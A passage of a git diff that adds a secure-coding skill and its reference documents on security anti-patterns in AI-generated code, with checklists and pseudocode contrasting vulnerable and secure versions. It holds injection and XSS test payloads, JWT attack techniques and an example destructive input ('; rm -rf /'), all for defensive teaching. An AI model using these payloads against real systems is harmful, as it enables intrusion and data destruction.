Prepared statements used for ALL query types (SELECT, INSERT, ORDER BY) | + +## Pattern 3: Cross-Site Scripting (XSS) + +| ✓ | Checkpoint | +|---|------------| +| □ | HTML encoding for HTML body context | +| □ | Attribute encoding for HTML attributes (especially event handlers) | +| □ | JavaScript encoding for inline scripts | +| □ | URL encoding for URL contexts | +| □ | CSP headers configured with strict policy (no `unsafe-inline`) | +| □ | `innerHTML` avoided; use `textContent` or framework safe bindings | +| □ | Sanitization libraries tested against mutation XSS | + +## Pattern 4: Authentication/Session Security + +| ✓ | Checkpoint | +|---|------------| +| □ | Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) | +| □ | Session tokens cryptographically random (256+ bits entropy) | +| □ | JWT algorithm explicitly validated (`alg: none` rejected) | +| □ | Tokens stored in HttpOnly, Secure, SameSite cookies | +| □ | Session invalidated on logout (server-side) | +| □ | Constant-time comparison for password/token verification | +| □ | Rate limiting on authentication endpoints | + +## Pattern 5: Cryptographic Failures + +| ✓ | Checkpoint | +|---|------------| +| □ | AES-256-GCM or ChaCha20-Poly1305 for symmetric encryption | +| □ | Fresh random IV/nonce for every encryption operation | +| □ | CSPRNG used for all security-sensitive random values | +| □ | bcrypt/Argon2id for password hashing (not PBKDF2 for passwords) | +| □ | Key derivation uses HKDF or PBKDF2 with appropriate iterations | +| □ | No ECB mode, no static IVs, no Math.random() | +| □ | Constant-time comparison for MAC/signature verification | + +## Pattern 6: Input Validation + +| ✓ | Checkpoint | +|---|------------| +| □ | All validation performed on server side | +| □ | Schema validation with `additionalProperties: false` | +| □ | All regex patterns anchored with `^` and `$` | +| □ | Length limits checked BEFORE regex matching | +| □ | Null bytes rejected in string input | +| □ | Unicode normalized before validation | +| □ | Type coercion explicit with error handling | + +--- + +# Testing Recommendations by Vulnerability Type + +## Hardcoded Secrets Testing + +```pseudocode +// Automated Secret Detection +1. Pre-commit hooks with secret scanners: + - TruffleHog + - detect-secrets + - gitleaks + - git-secrets + +2. CI/CD Pipeline Scanning: + - Run on every PR/MR + - Scan full git history on merge to main + - Block deployment on secret detection + +3. Runtime Detection: + - Log analysis for credential patterns + - API request auditing for hardcoded keys + - Cloud provider secret exposure alerts + +// Testing Checklist +- [ ] Scan all source files for API key patterns +- [ ] Scan all config files for password strings +- [ ] Check git history for past secret commits +- [ ] Verify environment variables are properly loaded +- [ ] Test application behavior when secrets are missing +- [ ] Verify secrets are not exposed in error messages +``` + +## SQL/Command Injection Testing + +```pseudocode +// Automated Testing Tools +1. SAST (Static Analysis): + - Semgrep with injection rules + - CodeQL injection queries + - SonarQube SQL injection checks + +2. DAST (Dynamic Analysis): + - SQLMap for SQL injection + - Burp Suite active scanning + - OWASP ZAP automated scan + +3. Manual Testing Payloads: + // SQL Injection + - Single quote: ' + - Comment: -- or # + - Boolean: ' OR '1'='1 + - Time-based: '; WAITFOR DELAY '0:0:10'-- + - Union: ' UNION SELECT null,null-- + + // Command Injection + - Semicolon: ;whoami + - Pipe: |id + - Backticks: `whoami` + - Command substitution: $(whoami) + - Newline: %0a id + +// Testing Checklist +- [ ] Test all user input fields with injection payloads +- [ ] Test ORDER BY, LIMIT, table name parameters +- [ ] Test stored data for second-order injection +- [ ] Test file paths for command injection +- [ ] Verify all queries use parameterization +- [ ] Check logs don't reveal injection success/failure +``` + +## XSS Testing + +```pseudocode +// Automated Testing +1. Browser Tools: + - DOM Invader (Burp) + - XSS Hunter + - DOMPurify testing mode + +2. Automated Scanners: + - Burp Suite XSS scanner + - OWASP ZAP active scan + - Nuclei XSS templates + +3. Manual Testing Payloads: + // HTML Context + - + - + - + + // Attribute Context + - " onmouseover="alert(1) + - ' onfocus='alert(1)' autofocus=' + + // JavaScript Context + - '-alert(1)-' + - ';alert(1)// + - \u003cscript\u003e + + // URL Context + - javascript:alert(1) + - data:text/html, + +// Testing Checklist +- [ ] Test all output points with context-specific payloads +- [ ] Test encoding bypass techniques +- [ ] Test DOM XSS with source/sink analysis +- [ ] Verify CSP headers block inline scripts +- [ ] Test mutation XSS with sanitizer bypass payloads +- [ ] Check for polyglot XSS across contexts +``` + +## Authentication/Session Testing + +```pseudocode +// Testing Tools +1. Session Analysis: + - Burp Suite session handling + - OWASP ZAP session management + - Custom scripts for token analysis + +2. JWT Testing: + - jwt.io debugger + - jwt_tool + - jose library testing + +3. Manual Testing: + // Session Token Analysis + - Check entropy (should be 256+ bits) + - Test token predictability + - Test session fixation + + // JWT Attacks + - Algorithm confusion (RS256 → HS256) + - None algorithm bypass + - Key injection attacks + - Signature stripping + + // Authentication Bypass + - SQL injection in login + - Password reset token prediction + - OAuth state parameter manipulation + +// Testing Checklist +- [ ] Test session token randomness +- [ ] Verify session invalidation on logout +- [ ] Test for session fixation +- [ ] Verify JWT algorithm validation +- [ ] Test rate limiting on login +- [ ] Check for timing attacks on password comparison +- [ ] Test password reset flow for token issues +``` + +## Cryptographic Implementation Testing + +```pseudocode +// Crypto Testing Tools +1. Static Analysis: + - Semgrep crypto rules + - CryptoGuard + - Crypto-detector + +2. Manual Review: + // Check for weak algorithms: + grep -r "MD5\|SHA1\|DES\|RC4\|ECB" . + + // Check for static IVs: + grep -r "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" . + + // Check for weak randomness: + grep -r "Math\.random\|random\.random\|rand\(\)" . + +3. Runtime Testing: + - Encrypt same plaintext twice, verify different ciphertext + - Test key derivation iterations (should take 100ms+) + - Verify timing consistency in comparisons + +// Testing Checklist +- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage +- [ ] Confirm unique IV/nonce per encryption +- [ ] Test password hashing takes appropriate time (100ms+) +- [ ] Verify CSPRNG used for all secrets +- [ ] Check key derivation iteration counts +- [ ] Test for padding oracle vulnerabilities +- [ ] Verify constant-time comparison functions +``` + +## Input Validation Testing + +```pseudocode +// Testing Approach +1. Boundary Testing: + - Empty strings, null, undefined + - Max length + 1 + - Integer boundaries (MAX_INT, MIN_INT) + - Unicode normalization variants + +2. Type Confusion: + - Array where string expected: ["value"] + - Object where string expected: {"$gt": ""} + - Number where string expected: 12345 + - Boolean where object expected: true + +3. Encoding Bypass: + - URL encoding: %00, %2e%2e%2f + - Unicode: \u0000, \ufeff + - Double encoding: %252e + - Overlong UTF-8 + +4. ReDoS Testing: + - For each regex, test with: (valid_char * 30) + invalid_char + - Measure response time (should be < 100ms) + - Use regex-dos-detector tools + +// Testing Checklist +- [ ] Test all endpoints with null/empty values +- [ ] Test numeric fields with boundary values +- [ ] Test string fields with max length exceeded +- [ ] Test type confusion for all input fields +- [ ] Test regex patterns for ReDoS +- [ ] Verify server-side validation matches client-side +- [ ] Test Unicode normalization issues +``` + +--- + +# Additional Patterns Reference + +This depth document covers the 6 most critical patterns in extensive detail. For coverage of additional security anti-patterns, see [[ANTI_PATTERNS_BREADTH]], which includes: + +| Pattern Category | Patterns Covered | +|-----------------|------------------| +| **File System Security** | Path traversal, unsafe file uploads, insecure temp files | +| **Access Control** | Missing authorization checks, IDOR, privilege escalation | +| **Network Security** | SSRF, insecure deserialization, unvalidated redirects | +| **Error Handling** | Information disclosure, stack traces, verbose errors | +| **Logging Security** | Sensitive data in logs, insufficient logging | +| **Concurrency** | Race conditions, TOCTOU, deadlocks | +| **Dependency Security** | Outdated dependencies, slopsquatting, lockfile tampering | +| **Configuration** | Debug mode in production, default credentials | +| **API Security** | Mass assignment, excessive data exposure, rate limiting | + +Use the breadth document for quick reference across many patterns. Use this depth document for comprehensive understanding of the most critical patterns. + +--- + +# External Resources + +## OWASP Resources + +- **OWASP Top 10 (2021):** https://owasp.org/Top10/ +- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/ +- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/ +- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/ + +### Relevant Cheat Sheets + +| Pattern | OWASP Cheat Sheet | +|---------|-------------------| +| Secrets Management | [Secrets Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html) | +| SQL Injection | [Query Parameterization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html) | +| XSS | [XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) | +| Authentication | [Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html) | +| Session Management | [Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html) | +| Cryptography | [Cryptographic Storage Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html) | +| Input Validation | [Input Validation Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html) | + +## CWE References + +- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html +- **CWE/SANS Top 25:** https://www.sans.org/top25-software-errors/ + +### CWE Mappings for This Document + +| Pattern | Primary CWEs | +|---------|--------------| +| Hardcoded Secrets | CWE-798, CWE-259, CWE-321, CWE-200 | +| SQL Injection | CWE-89, CWE-564 | +| Command Injection | CWE-78, CWE-77 | +| XSS | CWE-79, CWE-80, CWE-83, CWE-87 | +| Authentication | CWE-287, CWE-384, CWE-613, CWE-307 | +| Session Security | CWE-384, CWE-613, CWE-614, CWE-1004 | +| Cryptographic Failures | CWE-327, CWE-328, CWE-329, CWE-338, CWE-916 | +| Input Validation | CWE-20, CWE-1333, CWE-185, CWE-176 | + +## AI Code Security Research + +- **GitHub Copilot Security Analysis:** https://arxiv.org/abs/2108.09293 +- **Stanford/Asleep at the Keyboard Study:** https://arxiv.org/abs/2211.03622 +- **USENIX Package Hallucination Study (2024):** https://www.usenix.org/conference/usenixsecurity24 +- **Veracode State of Software Security (2024-2025):** https://www.veracode.com/state-of-software-security-report +- **Snyk Developer Security Survey (2024):** https://snyk.io/reports/ + +## Security Testing Tools + +| Tool | Purpose | URL | +|------|---------|-----| +| Semgrep | Static analysis with security rules | https://semgrep.dev | +| CodeQL | GitHub security queries | https://codeql.github.com | +| TruffleHog | Secret scanning | https://github.com/trufflesecurity/trufflehog | +| SQLMap | SQL injection testing | https://sqlmap.org | +| Burp Suite | Web security testing | https://portswigger.net/burp | +| OWASP ZAP | Open source web security scanner | https://www.zaproxy.org | +| jwt_tool | JWT security testing | https://github.com/ticarpi/jwt_tool | +| gitleaks | Git secret scanning | https://github.com/gitleaks/gitleaks | + +--- + +# Document Information + +**Document:** AI Code Security Anti-Patterns: Depth Version +**Version:** 1.0.0 +**Last Updated:** 2026-01-18 +**Patterns Covered:** 6 (Hardcoded Secrets, SQL/Command Injection, XSS, Authentication/Session, Cryptography, Input Validation) + +## Change Log + +| Date | Version | Changes | +|------|---------|---------| +| 2026-01-18 | 1.0.0 | Initial release with 6 comprehensive pattern deep-dives | + +## Related Documents + +- [[ANTI_PATTERNS_BREADTH]] - Quick reference covering 25+ security patterns +- [[Ranking-Matrix]] - Priority scoring methodology and pattern rankings +- [[Pseudocode-Examples]] - Additional code examples for all patterns + +## Contributing + +This document is maintained as part of the AI Code Security Anti-Patterns project. Security patterns evolve as new research emerges and AI models change. Contributions welcome for: + +- New edge cases and exploitation techniques +- Updated statistics and research citations +- Additional testing methodologies +- Framework-specific secure coding examples + +--- + +*This document is designed to be included in AI assistant context windows to improve the security of generated code. For maximum effectiveness, include along with [[ANTI_PATTERNS_BREADTH]] when reviewing or generating security-sensitive code.* + +--- + +**END OF DOCUMENT** diff --git a/.codex/skills/sec-context/SKILL.md b/.codex/skills/sec-context/SKILL.md new file mode 100644 index 0000000..f00ab01 --- /dev/null +++ b/.codex/skills/sec-context/SKILL.md @@ -0,0 +1,38 @@ +--- +name: sec-context +description: Use when generating or reviewing code for security risks (auth, input validation, DB queries, file handling, templates, secrets, SSRF/RCE). Applies the sec-context anti-patterns and outputs a checklist + concrete fixes + tests. Do not use for non-code or purely stylistic edits. +--- + +# sec-context skill + +## Goal +Apply the sec-context anti-pattern guidance to code generation and code review so risky patterns are caught early and fixes are concrete. + +## References (read these files when running the skill) +- references/ANTI_PATTERNS_BREADTH.md +- references/ANTI_PATTERNS_DEPTH.md + +## When invoked, do this +1. Identify the risk surfaces in scope (e.g., auth/session, web endpoints, input parsing, DB access, file upload, command execution, templating, dependency choice, serialization). +2. Open `ANTI_PATTERNS_BREADTH.md` and shortlist the relevant anti-pattern checks for those surfaces. +3. For each shortlisted item, open `ANTI_PATTERNS_DEPTH.md` to confirm: + - the exact failure mode + - safe patterns/remediations + - edge cases and common “almost fixed” traps +4. Produce outputs in this structure: + +### A) Findings checklist +- For each relevant anti-pattern: PASS/FAIL and 1–2 lines why. + +### B) Fixes +- For each FAIL: propose a specific code change (patch-quality guidance). +- Prefer allowlists, least privilege, safe defaults, and secure error handling/logging. +- Avoid “security theater”; focus on real exploit paths. + +### C) Tests / verification +- Add or recommend tests that would fail before the fix and pass after (including negative cases). +- If applicable, add lint/static-analysis hooks. + +## Guardrails +- Don’t paste long excerpts of the reference docs; summarize and apply. +- Don’t invent requirements; if key context is missing, ask targeted questions. diff --git a/.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md b/.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md new file mode 100644 index 0000000..215304f --- /dev/null +++ b/.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md @@ -0,0 +1,7315 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Breadth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding +related: + - "[[ANTI_PATTERNS_DEPTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns +## Breadth Version - Comprehensive Coverage + +> **Purpose:** Security anti-patterns guide for AI-assisted code generation +> **Audience:** Any LLM system prompt, RAG system, or context file +> **Format:** Pseudocode examples (implement in your target language) +> **How to use:** Include in system prompt or reference during code generation + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document contains security anti-patterns you MUST avoid when generating code. +Each section shows a VULNERABLE pattern (marked BAD) and a SECURE alternative (marked GOOD). +All examples are in PSEUDOCODE - implement the secure patterns in whatever language +the developer is using. When in doubt, choose the more secure option. + +**Key Statistics:** +- AI-generated code has an **86% XSS failure rate** (vs 31.6% human code) +- **5-21% of AI-suggested packages don't exist** (slopsquatting risk) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains +- SQL injection patterns appeared "thousands of times" in AI training data + +**Before generating any code:** +1. Never hardcode credentials, API keys, or secrets +2. Always parameterize database queries +3. Validate and sanitize all user input +4. Use cryptographically secure random for security tokens +5. Verify packages exist before suggesting imports +6. Encode output for the appropriate context (HTML, URL, JS) + +--- + +## Quick Reference Table + +| Pattern | CWE | Severity | Quick Fix | +|---------|-----|----------|-----------| +| Hallucinated Packages | CWE-1357 | Critical | Verify packages exist before import | +| XSS (Reflected/Stored/DOM) | CWE-79 | Critical | Encode output for context | +| Hardcoded Secrets | CWE-798 | Critical | Use environment variables | +| SQL Injection | CWE-89 | Critical | Use parameterized queries | +| Missing Authentication | CWE-287 | Critical | Apply auth to all protected endpoints | +| Command Injection | CWE-78 | Critical | Use argument arrays, avoid shell | +| Missing Input Validation | CWE-20 | High | Validate type, length, format, range | +| Unrestricted File Upload | CWE-434 | Critical | Validate extension, MIME, and size | +| Insufficient Randomness | CWE-330 | High | Use secrets module for tokens | +| Missing Rate Limiting | CWE-770 | High | Implement per-IP/user limits | +| Excessive Data Exposure | CWE-200 | High | Use DTOs with field allowlists | +| Path Traversal | CWE-22 | High | Validate paths within allowed dirs | +| Weak Password Hashing | CWE-327 | High | Use bcrypt/argon2 with salt | +| Log Injection | CWE-117 | Medium | Sanitize newlines, use structured logging | +| Debug Mode in Production | CWE-215 | High | Environment-based configuration | +| Weak Encryption | CWE-326 | High | Use AES-GCM or ChaCha20-Poly1305 | +| Session Fixation | CWE-384 | High | Regenerate session ID on login | +| JWT Misuse | CWE-287 | High | Strong secrets, explicit algorithms | +| Mass Assignment | CWE-915 | High | Allowlist assignable fields | +| Missing Security Headers | CWE-16 | Medium | Add CSP, X-Frame-Options, HSTS | +| Open CORS | CWE-346 | Medium | Restrict to known origins | +| LDAP Injection | CWE-90 | High | Escape special LDAP characters | +| XPath Injection | CWE-643 | High | Use parameterized XPath or validate | +| Insecure Temp Files | CWE-377 | Medium | Use mkstemp with restrictive perms | +| Verbose Error Messages | CWE-209 | Medium | Generic external, detailed internal | + +--- + +## 1. Secrets and Credentials Management + +**CWE References:** CWE-798 (Hard-coded Credentials), CWE-259 (Hard-coded Password) +**Severity:** Critical | **Related:** [[Hardcoded-Secrets]] + +> **Risk:** Secrets committed to version control are scraped within minutes. Leads to cloud resource abuse, data breaches, and significant financial costs. AI frequently generates code with embedded credentials from tutorial examples. + +### 1.1 Hardcoded Passwords and API Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded API keys and passwords +// ======================================== +CONSTANT API_KEY = "sk-abcd1234efgh5678ijkl9012mnop3456" +CONSTANT DB_PASSWORD = "super_secret_password" +CONSTANT AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE" +CONSTANT AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" + +FUNCTION call_api(endpoint): + headers = {"Authorization": "Bearer " + API_KEY} + RETURN http.get(endpoint, headers) +END FUNCTION + +// ======================================== +// GOOD: Environment variables +// ======================================== +FUNCTION call_api(endpoint): + api_key = environment.get("API_KEY") + + IF api_key IS NULL: + THROW Error("API_KEY environment variable required") + END IF + + headers = {"Authorization": "Bearer " + api_key} + RETURN http.get(endpoint, headers) +END FUNCTION +``` + +### 1.2 Credentials in Configuration Files + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Credentials in config committed to repo +// ======================================== +// config.json (tracked in git) +{ + "database_url": "postgresql://admin:password123@localhost:5432/mydb", + "redis_password": "redis_secret_123", + "smtp_password": "mail_password" +} + +FUNCTION connect_database(): + config = load_json("config.json") + connection = database.connect(config.database_url) + RETURN connection +END FUNCTION + +// ======================================== +// GOOD: External secret management +// ======================================== +// config.json (no secrets, safe to commit) +{ + "database_host": "localhost", + "database_port": 5432, + "database_name": "mydb" +} + +FUNCTION connect_database(): + config = load_json("config.json") + + // Credentials from environment or secret manager + db_user = environment.get("DB_USER") + db_password = environment.get("DB_PASSWORD") + + IF db_user IS NULL OR db_password IS NULL: + THROW Error("Database credentials not configured") + END IF + + url = "postgresql://" + db_user + ":" + db_password + "@" + + config.database_host + ":" + config.database_port + "/" + config.database_name + RETURN database.connect(url) +END FUNCTION +``` + +### 1.3 Secrets in Client-Side Code + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Secrets exposed in frontend JavaScript +// ======================================== +// frontend.js (served to browser) +CONSTANT STRIPE_SECRET_KEY = "sk_live_abc123..." // Never expose secret keys! +CONSTANT ADMIN_PASSWORD = "admin123" + +FUNCTION charge_card(card_number, amount): + RETURN http.post("https://api.stripe.com/charges", { + api_key: STRIPE_SECRET_KEY, // Visible in browser DevTools! + card: card_number, + amount: amount + }) +END FUNCTION + +// ======================================== +// GOOD: Backend proxy for sensitive operations +// ======================================== +// frontend.js +FUNCTION charge_card(card_token, amount): + // Only send public token, backend handles secret key + RETURN http.post("/api/charges", { + token: card_token, + amount: amount + }) +END FUNCTION + +// backend.js (server-side only) +FUNCTION handle_charge(request): + stripe_key = environment.get("STRIPE_SECRET_KEY") + + RETURN stripe.charges.create({ + api_key: stripe_key, + source: request.token, + amount: request.amount + }) +END FUNCTION +``` + +### 1.4 Insecure Credential Storage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Storing credentials in plaintext +// ======================================== +FUNCTION save_user_credentials(username, password): + // Dangerous: Plaintext password storage + database.insert("credentials", { + username: username, + password: password // Stored as-is! + }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Dangerous: No encryption + database.insert("api_keys", { + user_id: user_id, + key: api_key + }) +END FUNCTION + +// ======================================== +// GOOD: Proper credential protection +// ======================================== +FUNCTION save_user_credentials(username, password): + // Hash passwords with bcrypt + salt = bcrypt.generate_salt(rounds=12) + password_hash = bcrypt.hash(password, salt) + + database.insert("credentials", { + username: username, + password_hash: password_hash + }) +END FUNCTION + +FUNCTION save_api_key(user_id, api_key): + // Encrypt sensitive data at rest + encryption_key = secret_manager.get("DATA_ENCRYPTION_KEY") + encrypted_key = aes_gcm_encrypt(api_key, encryption_key) + + database.insert("api_keys", { + user_id: user_id, + encrypted_key: encrypted_key + }) +END FUNCTION +``` + +### 1.5 Missing Secret Rotation Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Static secrets with no rotation capability +// ======================================== +CONSTANT JWT_SECRET = "static_jwt_secret_forever" + +FUNCTION create_token(user_id): + // No way to rotate without breaking all existing tokens + RETURN jwt.encode({user: user_id}, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// ======================================== +// GOOD: Versioned secrets supporting rotation +// ======================================== +FUNCTION get_jwt_secret(version=NULL): + IF version IS NULL: + version = environment.get("JWT_SECRET_VERSION", "v1") + END IF + + // Fetch versioned secret from manager + RETURN secret_manager.get("JWT_SECRET_" + version) +END FUNCTION + +FUNCTION create_token(user_id): + current_version = environment.get("JWT_SECRET_VERSION") + secret = get_jwt_secret(current_version) + + payload = { + user: user_id, + secret_version: current_version, // Include version for validation + exp: current_timestamp() + 3600 + } + RETURN jwt.encode(payload, secret, algorithm="HS256") +END FUNCTION + +FUNCTION verify_token(token): + // Decode header to get version + unverified = jwt.decode(token, verify=FALSE) + version = unverified.get("secret_version", "v1") + + secret = get_jwt_secret(version) + RETURN jwt.decode(token, secret, algorithms=["HS256"]) +END FUNCTION +``` + +--- + +## 2. Injection Vulnerabilities + +**CWE References:** CWE-89 (SQL Injection), CWE-78 (OS Command Injection), CWE-90 (LDAP Injection), CWE-643 (XPath Injection), CWE-943 (NoSQL Injection), CWE-1336 (Template Injection) +**Severity:** Critical | **Related:** [[Injection-Vulnerabilities]] + +> **Risk:** Injection vulnerabilities allow attackers to execute arbitrary code, queries, or commands by manipulating user input. AI models frequently generate vulnerable string concatenation patterns from training data containing millions of insecure examples. Always use parameterized queries and avoid dynamic command construction. + +### 2.1 SQL Injection (String Concatenation in Queries) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: String concatenation in SQL queries +// ======================================== +FUNCTION get_user(username): + // Vulnerable: User input directly concatenated + query = "SELECT * FROM users WHERE username = '" + username + "'" + RETURN database.execute(query) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Vulnerable: Multiple injection points + query = "SELECT * FROM products WHERE category = '" + category + + "' AND price > " + min_price + RETURN database.execute(query) +END FUNCTION + +// Attack: username = "admin' OR '1'='1' --" +// Result: SELECT * FROM users WHERE username = 'admin' OR '1'='1' --' +// This bypasses authentication and returns all users + +// ======================================== +// GOOD: Parameterized queries (prepared statements) +// ======================================== +FUNCTION get_user(username): + // Safe: Parameters are escaped automatically + query = "SELECT * FROM users WHERE username = ?" + RETURN database.execute(query, [username]) +END FUNCTION + +FUNCTION search_products(category, min_price): + // Safe: All parameters bound separately + query = "SELECT * FROM products WHERE category = ? AND price > ?" + RETURN database.execute(query, [category, min_price]) +END FUNCTION + +// With named parameters (preferred for clarity) +FUNCTION get_user_named(username): + query = "SELECT * FROM users WHERE username = :username" + RETURN database.execute(query, {username: username}) +END FUNCTION +``` + +### 2.2 Command Injection (Unsanitized Shell Commands) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Shell command with user input +// ======================================== +FUNCTION ping_host(hostname): + // Vulnerable: User controls shell command + command = "ping -c 4 " + hostname + RETURN shell.execute(command) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Vulnerable: Multiple injection points + command = "convert " + input_path + " output." + output_format + RETURN shell.execute(command) +END FUNCTION + +// Attack: hostname = "google.com; rm -rf /" +// Result: ping -c 4 google.com; rm -rf / +// This executes the ping AND deletes the filesystem + +// ======================================== +// GOOD: Use argument arrays, avoid shell +// ======================================== +FUNCTION ping_host(hostname): + // Validate input format first + IF NOT is_valid_hostname(hostname): + THROW Error("Invalid hostname format") + END IF + + // Safe: Arguments passed as array, no shell interpolation + RETURN process.execute(["ping", "-c", "4", hostname], shell=FALSE) +END FUNCTION + +FUNCTION convert_file(input_path, output_format): + // Validate allowed formats + allowed_formats = ["png", "jpg", "gif", "webp"] + IF output_format NOT IN allowed_formats: + THROW Error("Invalid output format") + END IF + + // Validate path is within allowed directory + IF NOT path.is_within(input_path, UPLOAD_DIRECTORY): + THROW Error("Invalid file path") + END IF + + output_path = path.join(OUTPUT_DIR, "output." + output_format) + RETURN process.execute(["convert", input_path, output_path], shell=FALSE) +END FUNCTION + +// Helper: Validate hostname format +FUNCTION is_valid_hostname(hostname): + // Only allow alphanumeric, dots, and hyphens + pattern = "^[a-zA-Z0-9][a-zA-Z0-9.-]{0,253}[a-zA-Z0-9]$" + RETURN regex.match(pattern, hostname) +END FUNCTION +``` + +### 2.3 LDAP Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped LDAP filters +// ======================================== +FUNCTION find_user_by_name(username): + // Vulnerable: User input in LDAP filter + filter = "(uid=" + username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Vulnerable: Both fields injectable + filter = "(&(uid=" + username + ")(userPassword=" + password + "))" + results = ldap.search(BASE_DN, filter) + RETURN results.count > 0 +END FUNCTION + +// Attack: username = "*)(uid=*))(|(uid=*" +// Result: (uid=*)(uid=*))(|(uid=*) +// This can return all users or bypass authentication + +// ======================================== +// GOOD: Escape LDAP special characters +// ======================================== +FUNCTION escape_ldap(input): + // Escape LDAP special characters: * ( ) \ NUL + result = input + result = result.replace("\\", "\\5c") // Backslash first + result = result.replace("*", "\\2a") + result = result.replace("(", "\\28") + result = result.replace(")", "\\29") + result = result.replace("\0", "\\00") + RETURN result +END FUNCTION + +FUNCTION find_user_by_name(username): + // Safe: Input is escaped before use + safe_username = escape_ldap(username) + filter = "(uid=" + safe_username + ")" + RETURN ldap.search("ou=users,dc=example,dc=com", filter) +END FUNCTION + +FUNCTION authenticate_ldap(username, password): + // Better: Use LDAP bind for authentication instead of filter + user_dn = "uid=" + escape_ldap(username) + ",ou=users,dc=example,dc=com" + + TRY: + connection = ldap.bind(user_dn, password) + connection.close() + RETURN TRUE + CATCH LDAPError: + RETURN FALSE + END TRY +END FUNCTION +``` + +### 2.4 XPath Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unescaped XPath queries +// ======================================== +FUNCTION find_user_xml(username): + // Vulnerable: User input in XPath expression + xpath = "//users/user[name='" + username + "']" + RETURN xml_document.query(xpath) +END FUNCTION + +FUNCTION authenticate_xml(username, password): + // Vulnerable: Both fields injectable + xpath = "//users/user[name='" + username + "' and password='" + password + "']" + result = xml_document.query(xpath) + RETURN result IS NOT EMPTY +END FUNCTION + +// Attack: username = "admin' or '1'='1" +// Result: //users/user[name='admin' or '1'='1'] +// This returns all users, bypassing authentication + +// ======================================== +// GOOD: Parameterized XPath or strict validation +// ======================================== +// Option 1: Use parameterized XPath (if supported) +FUNCTION find_user_xml(username): + xpath = "//users/user[name=$username]" + RETURN xml_document.query(xpath, {username: username}) +END FUNCTION + +// Option 2: Escape XPath special characters +FUNCTION escape_xpath(input): + // Handle quotes by splitting and concatenating + IF input.contains("'") AND input.contains('"'): + // Use concat() for strings with both quote types + parts = input.split("'") + escaped = "concat('" + parts.join("',\"'\",'" ) + "')" + RETURN escaped + ELSE IF input.contains("'"): + RETURN '"' + input + '"' + ELSE: + RETURN "'" + input + "'" + END IF +END FUNCTION + +FUNCTION find_user_xml_escaped(username): + // Validate input format first + IF NOT is_valid_username(username): + THROW Error("Invalid username format") + END IF + + safe_username = escape_xpath(username) + xpath = "//users/user[name=" + safe_username + "]" + RETURN xml_document.query(xpath) +END FUNCTION + +// Option 3: Strict whitelist validation +FUNCTION is_valid_username(username): + // Only allow alphanumeric and limited special chars + pattern = "^[a-zA-Z0-9_.-]{1,64}$" + RETURN regex.match(pattern, username) +END FUNCTION +``` + +### 2.5 NoSQL Injection + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unvalidated input in NoSQL queries +// ======================================== +FUNCTION find_user_nosql(query_params): + // Vulnerable: User can inject operators + // If query_params = {"username": {"$ne": ""}} + // This returns all users where username is not empty + RETURN mongodb.collection("users").find(query_params) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Vulnerable: Accepts objects, not just strings + query = { + username: username, // Could be {"$gt": ""} + password: password // Could be {"$gt": ""} + } + user = mongodb.collection("users").find_one(query) + RETURN user IS NOT NULL +END FUNCTION + +// Attack via JSON body: +// {"username": {"$gt": ""}, "password": {"$gt": ""}} +// This bypasses authentication by matching any non-empty values + +// ======================================== +// GOOD: Type validation and operator blocking +// ======================================== +FUNCTION find_user_nosql(username): + // Validate input is a string, not an object + IF typeof(username) != "string": + THROW Error("Username must be a string") + END IF + + // Safe: Only string values can be queried + RETURN mongodb.collection("users").find_one({username: username}) +END FUNCTION + +FUNCTION authenticate_nosql(username, password): + // Strict type checking + IF typeof(username) != "string" OR typeof(password) != "string": + THROW Error("Invalid credential types") + END IF + + // Additional: Block MongoDB operators + IF username.starts_with("$") OR password.starts_with("$"): + 